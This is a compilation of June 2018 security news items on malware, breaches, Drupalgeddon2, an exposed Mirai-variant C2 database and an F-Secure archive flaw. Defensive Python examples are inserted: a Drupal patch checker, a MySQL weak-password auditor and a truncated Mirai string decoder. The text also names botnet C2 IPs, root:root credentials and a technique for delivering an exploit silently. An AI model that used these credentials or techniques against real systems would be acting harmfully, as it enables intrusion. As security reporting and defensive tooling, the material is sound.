After collecting data on the matter, the agencies determined that international collaboration is needed due to many devices ensnared by botnets being located outside the U.S. They also believe this challenge can only be solved through collaboration between different stakeholders.

The organizations found that while the tools and processes required to address the problem exist, they are not applied in some market sectors due to various reasons, including budgets, lack of awareness, lack of incentives, and insufficient technical expertise.

“The recommended actions and options include ongoing activities that should be continued or expanded, as well as new initiatives. No single investment or activity can mitigate all threats, but organized discussions and stakeholder feedback will allow us to further evaluate and prioritize these activities based on their expected return on investment and ability to measurably impact ecosystem resilience,” reads the report from the DHS and the Department of Commerce.

DHS and Commerce on cybersecurity workforce

The DHS and the Commerce Department also published a report on supporting the growth and sustainment of the United States’ cybersecurity workforce.

According to the report, there had been nearly 300,000 cybersecurity-related job openings in the United States as of August 2017. The agencies believe veterans represent an underutilized workforce supply, and women and minorities are underrepresented in the field. They admit that while pay for cybersecurity roles is typically above average, the government pays cybersecurity staff below the level needed to attract the necessary talent.

“A successful cybersecurity workforce strategy for the Nation should include an enhanced focus upon the value of diversity and inclusion and convert it into a potent resource that can be used to great advantage. Fostering and sustaining a diverse workforce will support the ability to find new talent to carry out this effort and to uncover novel ways to solve problems. Integrating cyber security concepts into our primary and secondary education curricula will generate early interest in cyber security in a manner that cuts across all sectors of American society. Among workforce-aged adults, veterans, women, minorities, and the economically disadvantaged should be aggressively recruited, without compromising required standards,” the report reads.



New Backdoor Based on HackingTeam’s Surveillance Tool
6.6.2018 securityweek
Virus

A recently discovered backdoor built by the Iron cybercrime group is based on the leaked source code of Remote Control System (RCS), HackingTeam’s infamous surveillance tool, security firm Intezer reports.

The Iron group is known for the Iron ransomware (a rip-off of the Maktub malware) and is believed to have been active for around 18 months.

During this time, the cybercriminals built various malware families, including backdoors, crypto-miners, and ransomware, and targeted Windows, Linux, and Android devices. To date, the group is believed to have infected at least a few thousand victims.

Their new backdoor, the security researchers say, was first observed in April this year and features an installer protected with VMProtect and compressed using UPX.

During installation, it checks whether it is running in a virtual machine, drops and installs a malicious Chrome extension, creates a scheduled task, creates a mutex to ensure only one instance of itself is running, drops the backdoor in the Temp folder, then checks the OS version and launches the backdoor build that matches the platform.

The malware also checks whether Qihoo 360 products are present on the system and only proceeds if none is found. It also installs a rogue root CA certificate used to sign the backdoor binary, then creates a service pointing back to the backdoor.

Part of the backdoor’s code is based on HackingTeam’s leaked RCS source code, the researchers say. Specifically, the cybercriminals used two main functions in their IronStealer and Iron ransomware families.

These include virtual machine detection code taken directly from HackingTeam’s “Soldier” implant (which detects Cuckoo Sandbox, VMware products, and Oracle’s VirtualBox) and the DynamicCall module from HackingTeam’s “core” library (which calls external library functions dynamically while obfuscating the function name, making static analysis more difficult).

The malicious Chrome extension dropped by the malware is a patched version of Adblock Plus, which injects an in-browser crypto-mining module (based on CryptoNoter) and an in-browser payment hijacking module.

The extension runs constantly in the background as a stealthy host-based crypto-miner. Every minute, the malware checks whether Chrome is running and can silently launch it if it isn’t.

The backdoor also embeds Adblock Plus for IE, also modified similarly to the Chrome extension and capable of injecting remote JavaScript. This functionality, however, is no longer automatically used, the researchers discovered.

If Qihoo 360 Safe Guard or Internet Security is found on the system, the malware runs once, without persistence. Otherwise, it installs the aforementioned rogue, hardcoded root CA certificate to make the backdoor binary seem legitimate.

The malware then decrypts a shellcode that loads a Cobalt Strike beacon in memory and fetches a payload URL from a hardcoded Pastebin address.

Two different payloads were dropped by the malware, namely Xagent, a variant of “JbossMiner Mining Worm,” and the Iron ransomware, which started being dropped only recently.

The Iron backdoor drops the latest voidtool Everything search utility and silently installs it, using it to find files likely to contain cryptocurrency wallets (around 20 wallet types are targeted).

“IronStealer constantly monitors the user’s clipboard for Bitcoin, Monero & Ethereum wallet address regex patterns. Once matched, it will automatically replace it with the attacker’s wallet address so the victim would unknowingly transfer money to the attacker’s account,” the researchers explain.


Apple Touts Privacy Features of New Operating Systems
6.6.2018 securityweek Apple

Apple on Monday said new operating systems powering its mobile devices and computers would include features designed to thwart the use of secret trackers to monitor people's online activities.

The announcement by Apple comes amid a growing focus on protecting privacy following a Facebook data scandal and new rules being enforced by the European Union for online services.

Apple, kicking off its annual developers conference, announced that coming versions of software powering iPhone and Mac computers will block the use of so-called "cookies" from "like" buttons that can follow people from one website to another.

"Turns out 'like' buttons and 'comment' fields can be used to track you, so this year we are shutting that down," Apple senior vice president of software engineering Craig Federighi told a standing-room crowd of some 6,000 developers at Apple's Worldwide Developers Conference in the heart of Silicon Valley.

New macOS Mojave and iOS 12 software, to be released later this year, will also make it harder for trackers to build "unique fingerprints" by gleaning data about the devices being used, according to Federighi.

"It will become dramatically more difficult for data companies to identify your device and track you," Federighi said.

"We are bringing all these protections to both Mojave and iOS 12."

Enhanced privacy was part of a slew of improvements touted by Apple to developers, whose creations are key to the popularity of iPhones, iPads and Mac computers.

Apple's software upgrades also include features that help users understand how much time they are spending on their devices, amid concerns of growing smartphone "addiction."


26 Million Users Hit by Ticketfly Hack
6.6.2018 securityweek Hacking

Ticketfly, the ticket distribution service owned by Eventbrite, has started restoring services after its website was defaced by a hacker who also gained access to user information.

The attack took place on or around May 30, when a hacker decided to exploit a vulnerability he had found in Ticketfly systems. The attacker, using the online moniker “IsHaKdZ,” reportedly asked the company to pay 1 bitcoin for information on the security hole. Since Ticketfly did not comply with his request, IsHaKdZ defaced ticketfly.com and the websites of several music venues.

The hacker also stole and leaked the details of Ticketfly customers and employees. Troy Hunt, the owner of the Have I Been Pwned data breach notification service, has analyzed the data and determined that over 26 million unique users are impacted. The compromised data includes email addresses, names, physical addresses and phone numbers.

The hack appears to have targeted Ticketfly’s WordPress-based assets. WordPress is also used for Ticketfly-powered websites provided to music venues, which would explain how the hacker managed to deface several sites.

Ticketfly says it has started restoring some of the affected services, including Box Office, Emailer, reporting, scanning, printing, and ticket purchasing systems.

“We’re rolling out a secure website solution as an alternative to your Ticketfly-powered site to meet your immediate needs. We’ve built a secure, non-WordPress based website solution with your existing domain, and your site will appear sometime today,” the company told customers in an updated FAQ.

The company has not shared too many details on the impact of the breach, but it has confirmed that names, addresses, email addresses, and phone numbers belonging to Ticketfly fans have been compromised.

“Our investigation into the incident is ongoing. It's critical that the information we share with you is accurate and backed by certainty. We are working with a team of forensic cybersecurity experts; the reality is cyber incidents are unique, and the investigations typically take more time than one would like because the full picture of what happened isn't always quick to develop,” Ticketfly said.


Germany's Continental Bans WhatsApp From Work Phones
6.6.2018 securityweek Social

German car parts supplier Continental on Tuesday said it was banning the use of WhatsApp and Snapchat on work-issued mobile phones "with immediate effect" because of data protection concerns.

The company said such social media apps had "deficiencies" that made it difficult to comply with tough new EU data protection legislation, especially their insistence on having access to a user's contact list.

"Continental is prohibiting its employees from using social media apps like WhatsApp and Snapchat in its global company network, effective immediately," the firm said in a statement.

Some 36,000 employees would be affected by the move, a Continental spokesman told AFP.

The company, one of the world's leading makers of car parts, has over 240,000 staff globally.

A key principle of the European Union's new general data protection regulation (GDPR), which came into force on May 25, is that individuals must explicitly grant permission for their data to be used.

But Continental said that by demanding full access to address books, WhatsApp for example had shifted the burden onto the user, essentially expecting them to contact everyone in their phone to let them know their data was being shared.

"We think it is unacceptable to transfer to users the responsibility of complying with data protection laws," said Continental's CEO Elmar Degenhart.

The Hanover-based firm said it stood ready to reverse its decision once the service providers "change the basic settings to ensure that their apps comply with data-protection regulations by default".

The issue of how personal information is used and shared online was given fresh urgency after Facebook earlier this year admitted to a massive privacy breach that allowed a political consultancy linked to US President Donald Trump's 2016 campaign to harvest the data of up to 87 million users.


Many Drupal Sites Still Vulnerable to Drupalgeddon2 Attacks
6.6.2018 securityweek Attack

At least 115,000 websites powered by version 7 of the Drupal content management system are still vulnerable to Drupalgeddon2 attacks, despite patches being available since late March.

The flaw dubbed Drupalgeddon2 is officially tracked as CVE-2018-7600. It allows a remote attacker to execute arbitrary code and take complete control of a website running Drupal 6, 7 or 8. The issue was patched with the release of versions 7.58, 8.5.1, 8.3.9 and 8.4.6, and fixes are also available for Drupal 6, which has not been supported since February 2016.

Drupalgeddon2 has been exploited by malicious actors for both server-side and client-side attacks that deliver cryptocurrency miners, backdoors, RATs and tech support scams.

Despite the high risk of attacks, many administrators of Drupal websites still haven’t applied the patches.

Researcher Troy Mursch has conducted an analysis of Drupal 7 websites – Drupal 7 is the most widely used version and it currently powers more than 830,000 sites – and found that many are still vulnerable.

Mursch identified nearly 500,000 Drupal 7 websites through the PublicWWW source code search engine and found that 115,070 had been running outdated and vulnerable versions of the CMS. The analysis showed that roughly 134,000 sites had not been vulnerable, while for 225,000 the version they had been using could not be determined.

“Numerous vulnerable sites found in the Alexa Top 1 Million included websites of major educational institutions in the United States and government organizations around the world. Other notable unpatched sites found were of a large television network, a multinational mass media and entertainment conglomerate, and two well-known computer hardware manufacturers,” Mursch wrote on his Bad Packets Report blog.

The list of vulnerable websites has not been made public, but the researcher did send it to US-CERT and the Drupal Security Team.

While conducting the analysis, Mursch discovered a significant cryptojacking campaign that leverages the Coinhive service. Malicious actors managed to compromise at least 258 Drupal sites and abused them to mine for cryptocurrency. The list of victims included the Attorney General’s Office in Colorado, a police department in Belgium, and Fiat-owned automotive parts manufacturer Magneti Marelli.

An India-based research organization hit by this campaign had updated Drupal, but it failed to remove the malicious code. As the Drupal Security Team warned, updating the CMS does not remove malicious code from already compromised websites.
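Mursch's version triage and the Drupal Security Team's warning both come down to a version comparison that is easy to get wrong across the 7.x line and the three patched 8.x lines. The following Python is an added example, not Mursch's scanner: it reads a version from the first line of a Drupal 7 CHANGELOG.txt or from the Generator meta tag (which names only the major version and therefore yields "undetermined", the same bucket as the 225,000 sites above) and compares it against the fixed releases named in this article. Reading those two sources is this example's assumption, and the sample inputs are constructed. A "patched" verdict says only that the code base is current; as the paragraph above notes, it says nothing about whether a site compromised before the update is still carrying the attacker's code.

```python
import re

# Releases that closed CVE-2018-7600, per the article: the first fixed release
# on each supported branch.
FIXED_RELEASES = {
    (7,): (7, 58),
    (8, 3): (8, 3, 9),
    (8, 4): (8, 4, 6),
    (8, 5): (8, 5, 1),
}

# Two places a crawler can read a version from (this example's assumption):
# the first line of a Drupal 7 CHANGELOG.txt ("Drupal 7.58, 2018-03-28") and
# the Generator meta tag, which names only the major version.
CHANGELOG_RE = re.compile(r"^Drupal (\d+(?:\.\d+)+)", re.M)
GENERATOR_RE = re.compile(r'<meta\s+name="Generator"\s+content="Drupal (\d+)', re.I)


def parse_version(text):
    """Return a version tuple, or None when only the major version is exposed."""
    m = CHANGELOG_RE.search(text)
    if m:
        return tuple(int(p) for p in m.group(1).split("."))
    if GENERATOR_RE.search(text):
        return None  # "Drupal 7" alone cannot tell 7.57 from 7.58
    raise ValueError("no Drupal version marker found")


def assess(version):
    """Classify a version tuple as 'patched', 'vulnerable' or 'undetermined'."""
    if version is None:
        return "undetermined"
    major = version[0]
    if major <= 6:
        # End-of-life since February 2016; a fix exists only as a backport,
        # and a version number cannot show whether it was applied.
        return "vulnerable"
    if major == 7:
        fixed = FIXED_RELEASES[(7,)]
    elif major == 8:
        minor = version[1] if len(version) > 1 else 0
        if minor > 5:
            return "patched"  # every 8.x line after 8.5 shipped with the fix
        fixed = FIXED_RELEASES.get((8, minor))
        if fixed is None:
            return "vulnerable"  # 8.0-8.2 were unsupported and never patched
    else:
        return "patched"
    # Pad "8.5" to "8.5.0" so the tuple comparison is positional.
    padded = version + (0,) * (len(fixed) - len(version))
    return "patched" if padded >= fixed else "vulnerable"


def assess_text(text):
    """Convenience wrapper: raw CHANGELOG.txt or HTML in, verdict out."""
    return assess(parse_version(text))


# Constructed samples of what a crawler would fetch from two sites.
SAMPLE_CHANGELOG = "Drupal 7.57, 2018-02-21\n-----------------------\n- Fixed security issues.\n"
SAMPLE_HTML = '<html><head><meta name="Generator" content="Drupal 7 (http://drupal.org)" /></head></html>'

if __name__ == "__main__":
    print(assess_text(SAMPLE_CHANGELOG), assess_text(SAMPLE_HTML))
```

Sites that strip the Generator tag and block CHANGELOG.txt land in the "no marker" case, which is why a third of Mursch's sample could not be classified at all; an unclassifiable site should be treated as unknown rather than safe.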

This is the second cryptojacking campaign discovered by Mursch since the disclosure of Drupalgeddon2. In early May, he reported discovering more than 300 websites hacked in a similar operation, including sites belonging to universities and governments.

During the analysis of Drupalgeddon2, the Drupal Security Team and developer Jasper Mattsson, who also reported the original vulnerability, identified another flaw. This second vulnerability, tracked as CVE-2018-7602 and dubbed by some Drupalgeddon3, has also been exploited in the wild.


Apple Boosts Security in iOS 12, macOS Mojave
6.6.2018 securityweek Apple

At its Worldwide Developers Conference (WWDC) 2018 this week, Apple shared information on the security improvements that iOS 12 and macOS Mojave are set to bring when they arrive this fall.

While previewing the next platform iterations at the event, Apple revealed features that will change the overall user experience on both mobile and desktop devices, but also presented enhancements that should improve the overall privacy and security of its users.

One of the main changes impacts the Safari browser on both iOS and macOS, which will soon deliver improved Intelligent Tracking Prevention capabilities, preventing social media buttons (such as “Like” and “Share”) from tracking users without permission.

“Safari now also presents simplified system information when users browse the web, preventing them from being tracked based on their system configuration,” the iPhone maker says.

Other features the company previewed for the upcoming platform iterations include end-to-end encryption for FaceTime group calls and password managers integrated into macOS and iOS, to help users employ stronger passwords, store them securely, and automatically enter them when needed.

“Safari now also automatically creates, autofills and stores strong passwords when users create new online accounts and flags reused passwords so users can change them,” Apple said.

On macOS Mojave, new data protections will require applications to ask for user permission before using the camera and microphone or before accessing personal data such as mail history and messages database, the tech giant also says. This should prevent malicious software from spying on users.

To further strengthen user privacy, Apple also appears set to roll out a USB Restricted Mode in iOS 12, a feature that was first noticed in the iOS 11.3 beta, later removed, and then reintroduced in the iOS 11.4 beta.

With this feature, an iPhone that has not been unlocked for a week locks down its Lightning port to charge-only mode: a computer or USB accessory connected to it can draw power but cannot access the data until the passcode is entered.

“To improve security, for a locked iOS device to communicate with USB accessories you must connect an accessory via lightning connector to the device while unlocked—or enter your device passcode while connected—at least once a week,” Apple described the feature in iOS 11.3 beta.

As ElcomSoft’s Oleg Afonin pointed out last month, this means that law enforcement agencies attempting to retrieve data from a suspect’s iPhone will only have a small window of opportunity before the device locks down. The same applies to thieves and anyone else targeting that data.

The new feature appears as a reaction to a clash with the FBI a couple of years ago over the unlocking of the San Bernardino shooter’s iPhone. The legal battle eventually sparked a debate between supporters of backdoors in user products to facilitate criminal and national security investigations, and those who want data to be properly protected.

Later this month, as part of the iOS 12 public beta, users will also gain more control over notifications and detailed information on the time they spend on the phone, courtesy of a new Screen Time feature. There is also an App Limits feature to cap the time spent in an app, which gives parents more control over their children's use of a mobile device.


IBM Adds New Features to MaaS360 with Watson UEM Product
6.6.2018 securityweek IT

IBM announced on Monday that it has added two new important features to its “MaaS360 with Watson” unified endpoint management (UEM) solution.

UEM solutions allow enterprise IT teams to manage smartphones, tablets, laptops and IoT devices in their organization from a single management console.

IBM has improved its MaaS360 with Watson UEM product with two capabilities the company says can be highly useful for IT departments: app intelligence and reporting, and security policy recommendations.

Business Dashboards for Apps is designed to provide administrators information on mobile applications and how they are used by employees. This can help them get a better understanding of which apps require attention and investment and which ones can be removed.

IT teams can obtain information on the number of installs (by platform, manufacturer and ownership), usage (popularity and session length), performance (crashes and data usage), and trend information (crashes, network requests and data consumption over a period of six months). Admins can also apply filters to make analysis easier and more useful.

The second new feature, the Policy Recommendation Engine, helps IT teams by dynamically providing recommendations when configuring security policies. Recommendations are provided based on the organization’s profile and common practices observed at similar companies in the MaaS360 community.

“Imagine a way to configure your policies with guidance that is dynamically presented every step of the way, catered to your organization and the size of your deployment. Whether you’re new to the game — or have been managing policies for years — a little confidence in your configurations goes a long way,” IBM Security’s John Harrington Jr. said in a blog post.

IBM also announced this week the launch of Guardium Analyzer, a new tool that uses a specialized data classification engine and data patterns to identify and classify GDPR-relevant information across cloud and on-premise systems. The tool can also identify the databases most likely to fail a GDPR-focused audit, the company said.


Oops! Botnet Operators Use Default Credentials on Command and Control Server
6.6.2018 securityweek BotNet  IoT

Internet of Things (IoT) botnets prey on the use of default or weak credentials to compromise connected devices, but the operators of such a botnet also used default credentials in their operations.

As NewSky Security researchers recently discovered, the operators of the Mirai variant Owari used default credentials on their command and control (C&C) server, allowing easy access to its database.

First spotted in late 2016, Mirai was designed to target poorly secured devices to ensnare them into large distributed denial of service (DDoS) botnets. Ever since its source code leaked online, Mirai spawned numerous variants, such as Masuta, Satori, and Okiru, as well as the more recent Wicked, Sora, Owari, and Omni iterations.

What most of these variants inherit from Mirai, the security researchers say, is the use of a MySQL database server for C&C. This database, they reveal, contains three tables: users, history, and whitelist.

A recently observed Mirai variant named Owari is using this MySQL server structure, but its operators made the very same mistakes as the owners of the devices they targeted: they failed to properly secure the server.

Thus, NewSky Security stumbled upon an Owari server at IP 80(.)211(.)232(.)43 with port 3306, the default MySQL port, open to the Internet.

What’s more, the security researchers discovered that the attackers used the root:root username and password pair, “one of the weakest credentials known to mankind,” to secure the database, and also enabled read/write access to everyone.

As Dr. Vesselin Bontchev points out, it is not that easy to make a MySQL database accessible from anywhere, let alone to secure it so poorly that anyone can connect to it.

Vess (@VessOnSecurity), 4 Jun 2018: "It's not exactly spelled out in the article, but the perp wasn't just stupid (using weak credentials). He was *creatively* stupid. You have to try hard, in order to make a MySQL database accessible to the whole world. Not something you can do accidentally. https://twitter.com/ankit_anubhav/status/1003741307024625666"

Vess (@VessOnSecurity), 11:08 PM - Jun 4, 2018: "Like, by default, MySQL listens only to localhost. If you really want to shoot yourself in the foot and access it over the Internet, it forces you to define *triplets* of user/password/host from which the database is accessible."

Having access to the database, the security researchers glanced through the three tables. The users table contained login credentials (for both malware authors and customers), and information such as attack duration limits, maximum available bots, and cooldown time between commands.

“In the specific Owari case, we observe one user with duration limit of 3600 seconds with permissible bot usage set as -1 (maximum). It is to be noted that the credentials of all these botnet users are also weak,” the security researchers reveal.

The history table revealed details on attacks carried out against various IPs (some were IoT botnet related, suggesting that the attacker might have tried to target rival botnet operators), while the whitelist table was empty, suggesting that the botnet would attack any IP or device.

The security researchers also discovered that this was only one of the two Owari-related MySQL databases exposed to the Internet and secured with root:root, with the second one located at IP 80(.)211(.)45(.)89.
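What made both servers reachable is the combination the tweet above describes: a user/host grant that allows any host, plus a password from the shortest possible wordlist. The following Python is an added example, not NewSky's tooling: it audits rows from MySQL's own grant table (the output of `SELECT user, host, authentication_string FROM mysql.user`) for accounts reachable from outside the box and for passwords that hash to a known weak value. It assumes the mysql_native_password scheme of MySQL 5.x, where the stored value is "*" followed by the uppercase hex SHA1 of the SHA1 of the password; MySQL 8's default caching_sha2_password needs a different check. The sample rows are constructed.

```python
import hashlib

# mysql_native_password stores '*' + uppercase hex of SHA1(SHA1(password)).
# That matches MySQL 5.x servers; MySQL 8 defaults to caching_sha2_password,
# which this example does not handle (assumption of this example).
def mysql_native_password(password):
    inner = hashlib.sha1(password.encode()).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()


# Credentials worth trying first: the pair found on the Owari servers plus a
# few classic defaults.  Extend from a real wordlist in practice.
WEAK_PASSWORDS = ["root", "", "password", "123456", "mysql", "toor"]

LOCAL_HOSTS = {"localhost", "127.0.0.1", "::1"}


def is_remote_host(host):
    """True if the host pattern admits clients other than the box itself ('%' is the worst case)."""
    return host not in LOCAL_HOSTS


def audit_accounts(rows, wordlist=WEAK_PASSWORDS):
    """Check (user, host, authentication_string) rows for remote reach and weak passwords.

    `rows` is what `SELECT user, host, authentication_string FROM mysql.user`
    returns.  Returns one finding dict per problematic account.
    """
    guesses = {mysql_native_password(pw): pw for pw in wordlist}
    findings = []
    for user, host, auth in rows:
        issues = []
        if is_remote_host(host):
            issues.append("reachable from host pattern %r" % host)
        if auth in guesses:
            issues.append("password is %r" % guesses[auth])
        if auth == "":
            issues.append("no password set")
        if issues:
            findings.append({"account": "%s@%s" % (user, host), "issues": issues})
    return findings


# Constructed sample rows, hashed with the function above so the example runs
# offline.  The first row is the root:root-from-anywhere triplet the article
# describes; the second is what a properly scoped admin account looks like.
SAMPLE_ROWS = [
    ("root", "%", mysql_native_password("root")),
    ("root", "localhost", mysql_native_password("4Yg!x0q#Lm2vP9sR")),
    ("panel", "10.0.0.%", mysql_native_password("password")),
    ("reader", "localhost", ""),
]


def demo():
    return audit_accounts(SAMPLE_ROWS)


if __name__ == "__main__":
    for finding in demo():
        print(finding["account"], "->", "; ".join(finding["issues"]))
```

The audit covers only the grant table. The other half is the server's bind-address, which by default keeps the listener on localhost; an account such as root@'%' is harmless only for as long as that setting stays in place, and on these two servers it evidently did not.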

Although they gained write access to the MySQL databases, the researchers could not disrupt the botnet: C&C IPs are usually short-lived, because they are quickly flagged for malicious traffic, so operators rotate them often, and the two mentioned above are already offline.

Ankit Anubhav, Principal Researcher at NewSky Security, reveals that they decided to contact an Owari operator to ask about the revenue model, and learned that hiring the botnet costs $60 per month, which buys “around 600 seconds of bot time.” Because of that, the operator can “guarantee a stable bot count,” and can cover expenses with 10 to 15 customers each month.


Flaw in F-Secure Products Allowed Code Execution via Malicious Archives
6.6.2018 securityweek Vulnerability

A critical vulnerability affecting many consumer and corporate products from F-Secure could have been exploited for remote code execution using specially crafted archive files.

A researcher who uses the online moniker “landave” has identified several vulnerabilities related to 7-Zip, an open source file archiver used by many commercial products. Some of the security holes impact 7-Zip and products using it, while others are specific to the third-party implementations of 7-Zip.

Some of the vulnerabilities, disclosed in 2017, impact Bitdefender products. On Tuesday, landave published a blog post describing how one of the 7-Zip bugs he identified last year, namely CVE-2018-10115, can be used to achieve remote code execution on most F-Secure endpoint protection products for Windows.

The details of the vulnerability have been disclosed after F-Secure rolled out a patch via its automatic update mechanisms on May 22. Users don’t need to take any action, unless they explicitly disabled automatic updates.

The list of impacted products includes F-Secure SAFE for Windows, Client Security, Client Security Premium, Server Security, Server Security Premium, PSB Server Security, Email and Server Security, Email and Server Security Premium, PSB Email and Server Security, PSB Workstation Security, Computer Protection, and Computer Protection Premium.

Exploiting the vulnerability against 7-Zip directly was relatively easy and it only required the targeted user to extract a specially crafted RAR file. However, in the case of F-Secure products, exploitation is more difficult due to the use of the Address Space Layout Randomisation (ASLR) memory protection system.

Landave nevertheless found a way to bypass the protection and achieve code execution via malicious RAR files. The attacker could have sent the malicious file to the victim as an email attachment, but this scenario required the recipient to manually trigger a scan of the file.

A more efficient method involved getting the victim to visit a malicious web page set up to automatically download the exploit file.

“It turns out that F-Secure’s products intercept HTTP traffic and automatically scan files with up to 5MB in size. This automatic scan includes (by default) the extraction of compressed files. Hence, we can deliver our victim a web page that automatically downloads the exploit file. To do this silently (preventing the user even from noticing that a download is triggered), we can issue an asynchronous HTTP request,” the researcher explained.

In its own advisory, F-Secure said the flaw could have been exploited to take complete control of a system, but there was no evidence of exploitation before the release of the patch.

The security firm also pointed out that some user interaction was required for the exploit to work and noted that archive scanning is only triggered if the “Scan inside compressed files” option is enabled.

F-Secure has paid out a bug bounty, but the amount has not been disclosed. According to its Vulnerability Rewards Program page, the company offers up to €5,000 ($5,800) for vulnerabilities that allow remote code execution on the client software.


Fortinet Acquires Bradford Networks to Extend Security to the Edge
6.6.2018 securityweek IT

Fortinet has acquired Boston-based network security firm Bradford Networks. The purpose is to extend Fortinet's micro-segmentation to the new perimeter: the IoT and mobile edge.

A Fortinet spokesperson told SecurityWeek that it paid approximately $17 million in initial consideration, net of cash acquired and subject to certain adjustments. It may pay an additional $2 million as an earn-out, subject to certain performance conditions. According to Crunchbase, Bradford had raised roughly $14 million in funding.

Gartner predicts that the currently estimated 4 billion enterprise connected devices will grow to 7.5 billion in the next two years. Making sure that every one of those devices is both known and secure is difficult. It is, suggests Fortinet in a blog, a 'classic' example of the asymmetric security problem: "Security managers need to secure every single device every single time, while criminals only need one open port, one compromised or unknown device, or one uncontained threat to circumvent all of the effort going into securing the network."

"As large organizations continue to see high growth in network traffic and the number of devices and users accessing their networks," explains Ken Xie, founder, chairman of the board and CEO at Fortinet, "the risk of breach increases exponentially. According to a recent Forrester study, 82 percent of companies surveyed are unable to even identify all devices accessing their networks. The integration of Bradford Networks' technology with Fortinet's security fabric enables large enterprises with the continuous visibility, micro-segmentation and access control technology they need to contain threats and block untrusted devices from accessing the network."

Bradford Networks enhances Fortinet's Security Fabric by providing agentless visibility of endpoints, users, devices, and applications that access the corporate network, including headless devices and IoT. It brings security to IoT through device micro-segmentation and automatic policy assignment, allowing granular isolation of insecure devices.

Once visibility of all devices that connect to the network is attained, the next step is to make sure they are authenticated or authorized, and are subject to a context driven policy that defines who, what, when, and where connectivity is permitted.

"Such an approach -- where no unknown devices ever gain access to the corporate infrastructure, permitted devices are automatically segmented based on policies and roles, and connected devices that begin to behave badly are immediately quarantined from the network," says Fortinet, "becomes the foundation for a comprehensive positive security posture."

Fortinet's share price has grown steadily, from $35.83 in September 2017 to $62.48 at the start of 4 June 2018. A slight dip occurred with the Bradford Networks announcement (down to $61.70), but the share price has already risen above the pre-acquisition price to its highest ever value at $62.92, at the time of writing.

Fortinet does not expect the transaction to have a material impact on the company's second quarter or full year 2018 financial guidance disclosed on May 3, 2018.

Rob Scott, CEO at Bradford Networks, said, "We are excited to join with Fortinet, the leader in network security to deliver exceptional visibility and security at scale to large enterprise organizations. Bradford Networks' technology is already integrated with Fortinet's Security Fabric including FortiGate, FortiSIEM, FortiSwitch and FortiAP products to minimize the risk and impact of cyber threats in even the toughest security environments such as critical infrastructure - power, oil and gas and manufacturing."

Bradford Networks, the Fortinet spokesperson said, "will become part of the Fortinet brand and will enrich Fortinet’s IoT offering. The majority of Bradford Networks employees will transfer to Fortinet and be integrated across multiple functions based on areas of responsibilities."


Facebook Says Chinese Phone Makers Got Access to Data
6.6.2018 securityweek Social

Facebook on Tuesday confirmed that a Chinese phone maker deemed a national security threat by the US was among companies given access to data on users.

Huawei was able to access Facebook data to get the leading social network's applications to perform on smartphones, according to the California-based company.

"Facebook along with many other US tech companies have worked with them and other Chinese manufacturers to integrate their services onto these phones," Facebook mobile partnerships leader Francisco Varela said in a released statement.

"Given the interest from Congress, we wanted to make clear that all the information from these integrations with Huawei was stored on the device, not on Huawei's servers."

Facebook also had data access deals with Lenovo, OPPO and TCL of China, according to Varela.

"Facebook's integrations with Huawei, Lenovo, OPPO and TCL were controlled from the get go," Varela said.

Huawei has long disputed any links to the Chinese government, while noting that its infrastructure and computing products are used in 170 countries.

"Concerns about Huawei aren't new," US Senator Mark Warner, vice chairman of the senate select committee on intelligence, said Tuesday in a released statement.

"I look forward to learning more about how Facebook ensured that information about their users was not sent to Chinese servers."

Facebook said that it does not know of any privacy abuse by cellphone makers who years ago were able to gain access to personal data on users and their friends.

Before now-ubiquitous apps standardized the social media experience on smartphones, some 60 device makers like Amazon, Apple, Blackberry, HTC, Microsoft and Samsung worked with Facebook to adapt interfaces for the Facebook website to their own phones, the company said.

Facebook said it is winding up the interface arrangements with device makers as the company's smartphone apps dominate the service. The integration partnership with Huawei will terminate by the end of this week, according to the social network.

The social media leader said it "disagreed" with the conclusions of a New York Times report that found that the device makers could access information on Facebook users' friends without their explicit consent.

Facebook enabled device makers to interface with it at a time when it was building its service and they were developing new smartphone and social media technology.

But the report raised concerns that massive databases on users and their friends -- including personal data and photographs -- could be in the hands of device makers.


Mirai Variants Continue to Spawn in Vulnerable IoT Ecosystem
6.6.2018 securityweek BotNet

Mirai is the archetypal IoT botnet, first achieving infamy with a 665 Gbps DDoS attack against the KrebsOnSecurity website in September 2016. Within days, a second Mirai attack targeted the French hosting firm, OVH, with an attack that peaked at nearly 1 Tbps. These were, at the time, the largest DDoS attacks ever recorded.

But within a few more days, before the end of September 2016, the Mirai developer released the source code. It can now be found on GitHub. The developer closed his 'readme' file with a criticism of MalwareMustDie and the comment, "Just as I forever be free, you will be doomed to mediocracy forever."

He didn't remain free for very long. In January 2017, Brian Krebs identified Paras Jha as authoring Mirai; and in December 2017 the DoJ unsealed a plea-bargained guilty plea by Paras Jha for the development and use of Mirai. But it was too late to stop Mirai, because the code was in the public domain -- and it has ever since been used as the basic building block for other criminals to develop Mirai variants for their own use.

Network performance firm Netscout Arbor has taken a close look at four of the current Mirai variants: Satori, JenX, OMG and Wicked. Its Arbor Security Engineering & Response Team (ASERT) published a recent blog post describing how each of these botnets starts from the basic building blocks of Mirai and adds to, and sometimes removes from, the original Mirai functionality, adding, says ASERT, "their own flair."

Mirai itself spread by scanning for other internet-connected IoT devices (IP cameras and home routers) and 'brute-forcing' access via a list of default vendor passwords. Since so few consumers ever change the password that comes with the device, the process is remarkably successful. Paras Jha claimed that he had 380,000 bots in Mirai at the time of the Krebs attack.

Satori (or at least the 3rd variant of Satori) uses the same configuration table and the same string obfuscation technique as Mirai. However, says ASERT, "We see the author expanding on Mirai source code to include different exploits such as the Huawei Home Gateway exploit." The exploit was CVE-2017-17215. In December 2017, Check Point reported that hundreds of thousands of attempts to exploit this vulnerability had been made on Huawei HG532 home routers attempting to download and execute the Satori botnet.

The underlying code for JenX also comes from Mirai, again including the same configuration table and the same string obfuscation technique. However, JenX hard codes the C2 IP address while Mirai stores it in the configuration table. JenX has also removed the scanning and exploitation functions of Mirai, with this being handled by a separate system.
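The "configuration table" and "string obfuscation" that Satori and JenX inherit are simple enough to undo by hand, which is the first thing an analyst wants when a new fork turns up with a different C2. The following Python is an added example, not ASERT's or Fortinet's code: it reproduces the scheme from the public Mirai source (bot/table.c), where every byte of a table entry is XORed in turn with the four bytes of the key 0xdeadbeef, and extracts the NUL-terminated strings from an obfuscated blob. Forks that keep the scheme but change the key can be handled by passing their key. The sample table contents are constructed placeholders, not strings from any real sample.

```python
import string

# Mirai's bot/table.c keeps the C2 host, scanner strings, credentials and so
# on in a table whose entries are XOR-obfuscated with the 32-bit key
# 0xdeadbeef, applied byte-by-byte: each byte is XORed with each of the four
# key bytes in turn, so the net effect is a single-byte XOR with
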